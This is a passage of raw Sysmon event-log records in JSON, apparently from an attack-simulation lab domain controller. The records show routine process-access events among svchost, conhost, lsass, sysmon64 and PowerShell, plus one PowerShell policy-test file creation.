C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.268\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.268","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.299\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nProcessId: 2456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_13remnp3.3ln.ps1\r\nCreationUtcTime: 2020-08-01 07:59:10.299","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.299","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_13remnp3.3ln.ps1","CreationUtcTime":"2020-08-01 07:59:10.299","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.330\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.330","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.330\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.330","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
